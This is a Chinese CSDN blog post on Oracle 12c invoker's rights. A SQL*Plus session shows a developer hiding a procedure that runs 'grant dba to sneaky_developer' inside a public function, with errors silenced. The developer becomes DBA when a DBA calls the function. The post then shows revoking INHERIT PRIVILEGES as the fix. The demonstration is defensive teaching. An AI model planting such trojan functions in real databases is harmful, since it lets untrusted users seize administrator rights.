在plsql中控制调用者权限

最新推荐文章于 2021-10-12 01:09:54 发布
最新推荐文章于 2021-10-12 01:09:54 发布
阅读量1.1k 收藏
点赞数
分类专栏: -- Ora12c&13c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jc_benben/article/details/50998020
版权 
-- 1,环境创建
SQL> create user sneaky_developer identified by 123;

用户已创建。

SQL> grant create session,create procedure to sneaky_developer;

授权成功。

SQL> create user normal_user identified by 123;

用户已创建。

SQL> grant create session to normal_user;

授权成功。

SQL> create user dba_user identified by 123;

用户已创建。

SQL> grant create session,dba to dba_user;

授权成功。

SQL> conn sneaky_developer/123@pdb1
已连接。
SQL> create or replace function add_number(p1 in number,p2 in number)
  2  return number authid current_user
  3  as
  4  begin
  5      return (p1+p2);
  6  end;
  7  /

函数已创建。

SQL> grant execute on add_number to public;

授权成功。

-- 2,第一次测试
SQL> conn normal_user/123@pdb1;
已连接。
SQL> select sneaky_developer.add_number(1.1,2.2) from dual;

SNEAKY_DEVELOPER.ADD_NUMBER(1.1,2.2)
------------------------------------
                                 3.3

SQL> conn dba_user/123@pdb1
已连接。
SQL> select sneaky_developer.add_number(1.1,2.2) from dual;

SNEAKY_DEVELOPER.ADD_NUMBER(1.1,2.2)
------------------------------------
                                 3.3

SQL> SELECT grantee
  2  FROM   dba_role_privs
  3  WHERE  granted_role = 'DBA'
  4  ORDER BY grantee;

GRANTEE
--------------------------------------------------------------------------------

DBA_USER
SYS
SYSTEM

-- 修改函数
SQL> conn sneaky_developer/123@pdb1;
已连接。
SQL> create or replace procedure make_me_a_dba authid current_user as
  2  pragma autonomous_transaction;
  3  begin
  4     execute immediate 'grant dba to sneaky_developer';
  5  exception
  6    when others then
  7    null;
  8  end;
  9  /

过程已创建。

SQL> create or replace function add_number(p1 in number,p2 in number)
  2  return number authid current_user
  3  as
  4  begin
  5     make_me_a_dba;
  6     return (p1+p2);
  7  end;
  8  /

函数已创建。

-- 再次测试
SQL> conn normal_user/123@pdb1
已连接。
SQL> select sneaky_developer.add_number(1.1,2.2) from dual;

SNEAKY_DEVELOPER.ADD_NUMBER(1.1,2.2)
------------------------------------
                                 3.3

SQL> conn dba_user/123@pdb1
已连接。
SQL> select sneaky_developer.add_number(1.1,2.2) from dual;

SNEAKY_DEVELOPER.ADD_NUMBER(1.1,2.2)
------------------------------------
                                 3.3

SQL> select grantee from dba_role_privs where granted_role='DBA';

GRANTEE
--------------------------------------------------------------------------------

DBA_USER
SNEAKY_DEVELOPER
SYSTEM
SYS

SQL> revoke dba from sneaky_developer;

撤销成功。

SQL> select grantee from dba_role_privs where granted_role='DBA';

GRANTEE
--------------------------------------------------------------------------------

DBA_USER
SYSTEM
SYS

-- 撤销权限,第三次测试

SQL> conn sys@pdb1 as sysdba
输入口令:
已连接。
SQL> revoke inherit privileges on user dba_user from public;

撤销成功。

SQL> conn dba_user/123@pdb1
已连接。
SQL> select grantee from dba_role_privs where granted_role='DBA';

GRANTEE
--------------------------------------------------------------------------------

DBA_USER
SYSTEM
SYS

SQL> select sneaky_developer.add_number(1.1,2.2) from dual;
select sneaky_developer.add_number(1.1,2.2) from dual
       *
第 1 行出现错误:
ORA-06598: INHERIT PRIVILEGES 权限不足
ORA-06512: 在 "SNEAKY_DEVELOPER.ADD_NUMBER", line 1


SQL> select grantee from dba_role_privs where granted_role='DBA';

GRANTEE
--------------------------------------------------------------------------------

DBA_USER
SYSTEM
SYS

-- 文章参考来源:https://oracle-base.com

朝闻道-夕死可矣
关注
专栏目录
OCP复习 - PLSQL(16),管理(16-19) - 权限管理
alvanchen的专栏
07-20 675
<br />Oracle权限管理的几个基本概念<br />Oracle权限管理的几个基本概念是用户、角色、系统权限、对象权限。<br />用户(user)的概念显而易见。<br />系统权限(system privilege)是指系统层面的权限,如创建会话、创建表、索引等。<br />对象权限(object privilege)是指针对具体每个对象的权限。对象包括表、列、视图等。<br />角色(role)是一组权限的集合,因为Oracle的权限非常多,为了管理方便,引入了角色的概念。<br />通过创建用
plsqlDeveloper文手册及用户手册.rar
02-08
5. **安全性与权限**:如何在PLSQL Developer管理用户权限和角色,确保数据库的安全性。 6. **自定义设置**:自定义工作环境,如快捷键、颜色方案、模板等,以适应个人的工作习惯。 通过深入阅读这两份手册,你...
plsql调用者权限与定义者权限
cky0597的博客
08-18 212
一个简单的例子:SQL> conn / as sysdba已连接。SQL> create user naruto identified by naruto; 用户已创建。 SQL> grant d...
ORA-06598: insufficient INHERIT PRIVILEGES privilege (Doc ID 2690051.1)
j_ychen的博客
11-26 1426
Issue is from OEM data masking .Database using account pdbadmin , which has sysdba grant . But during Application data modeling job below error is coming. Processing application: TEST_MASK(TEST_MASK) User does not have sufficient privileges to complete..
【拾漏补遗】【12c Release 1 (12.1.0.2)】Managing Security for Definer's Rights and Invoker's Rights
viviliving的专栏
03-21 619
5Managing Security for Definer's Rights andInvoker's Rights Invoker’s rights and definer’s rights用于控制对特权的访问以运行用户创建的过程时具有几个安全优势 Topics: About Definer's Rights and Invoker's Rights How Proce...
ORACLE】在ORACLE数据库启用机器学习功能(OML)以支持PYTHON脚本的运行
DarkAthena的博客
10-12 692
前言 在 oracle 数据库 21C(20C)版本ORACLE数据库加入了机器学习功能,叫OML,全称(Oracle machine learning),并且加入了对python语言的支持,组件名叫 oml4py。这个组件是部署在数据库服务器端,然后有客户端,可使用python连接数据库进行机器学习操作,并且支持在oracle数据库存储创建管理python脚本并运行它。这样,我们可以通过这个功能,给ORACLE数据库添加python函数。以下内容根据oracle官网多篇文档翻译整合加本人实测遇坑优化
plsql文免安装版
04-25
它是一个轻量级的解决方案,无需安装,用户只需将压缩包解压即可开始使用,大大简化了部署过程,尤其适合在多台计算机间移动工作或在没有管理员权限的环境操作。 PLSQLOracle数据库的编程语言,全称为...
plsql 文绿色版
12-20
由于其便携性,用户可以随身携带,无需担心系统环境或权限问题,确保在任何有需要的地方都能迅速开展工作。 总结起来,PLSQL Developer是一款强大的PL/SQL编程工具,文绿色版的推出解决了文用户的需求,提高了...
PLSQL Developer 64
09-09
PLSQL Developer,你可以体验到以下核心功能: 1. **源代码编辑器**:它支持语法高亮、自动完成、错误检测和快速修复,极大地提高了编写PL/SQL代码的效率。编辑器还允许自定义代码模板,帮助快速构建常见的代码...
plsqldeveloper
07-06
在本文,我们将深入探讨PLSQL Developer的相关知识点。 1. **界面与集成环境** PLSQL Developer具有直观的用户界面,分为多个窗口,如对象浏览器、编辑器、调试器、数据查看器等,帮助开发者高效地进行数据库...
(Win10家庭版)Oracle出现insufficient privileges权限不足问题的解决方法之一
懵懵不懂的博客
08-06 3142
起因 在学习WEB时,需要用到数据库进行交互。当索取超级管理员身份时,报错提示权限不足。 conn /as sysdba ERROR:ORA-01031:insufficient privileges 摸索 我使用的系统是笔记本自带的Win10家庭版。为了解决问题,我查找了网上的许多资料。可惜,这些参考资料大多是默认系统为专业版,有组这个功能的。没有办法,只好自己瞎鼓捣。 解决办法 1.在开始菜单,找到Oracle文件夹,打开其的Administration Assistant for Window
sqlplus / as sysdba 报insufficient privileges(权限不足)的解决方案
wqh0830的博客
02-22 9050
使用sqlplus / as sysdba登录oracle时报错: 1、查看sqlnet.ora文件: 检查sqlnet.ora文件是否有SQLNET.AUTHENTICATION_SERVICES= (NTS)这句,没有就加上 2、添加windows用户: 原因:检查登陆windows的用户(administrator或安装oracle时候使用的用户)是不是在包含在ORA_DBA组...
12C ORA-错误汇总5 ORA-04930 to ORA-07499
badman250的专栏
03-02 3万+
ORA-04930 to ORA-07499 6 ORA-04930: open sequence number failed or initial state is valid Cause: Either Shared Sequence Number OS component was not installed properly, or an MC hardware failure may
指定控制文件目录是出现ORA-02065错误
cpyt79071的博客
04-19 1575
数据库重启后,出现无法启动实例的状况。1、写入参数文件,放在指定目录下:F:\oracle\product\10.2.0\db_1\database在initdemo.ora写入下列参...
ora-02065
hugh 's Oracle 10g blog
10-22 6066
SQL> alter system set job_queue_process=0; alter system set job_queue_process=0 * ERROR 位于第 1 行: ORA-02065: ??? ALTER SYSTEM ?? 命令写错了······ alter system set job_queue_processes=0;
ora-01031:insufficient privileges解决方法总结
热门推荐
冰刀(skate)
06-26 54万+
 author:skatetime :2009/06/24 sqlplus "/ as sysdba" 连不上,报ora-01031:insufficient privileges解决方法 注意多个数据库实例时候,set ORACLE_SID=, 1、检查sqlnet.ora(WINDOWS下位于%ORACLE_HOME%NETWORKADMIN目录)是否包含这句:SQ
Oracle sys用户登录权限不足insufficient privileges
水中月
07-31 6万+
1、使用服务器本地环境登录sqlplus ,命令为“sqlplus / as sysdba" ,如果您出现和截图一样的提示,那么这篇经验就是为了解决这个问题而存在的。 图解 2、右键点击“我的电脑”选择“管理”。“我的电脑”可以在桌面找到,也可以在开始菜单找到 图解 3、在“计算机管理”界面找到“本地用户和组”-“组”。并在相应的页面
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

朝闻道-夕死可矣

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值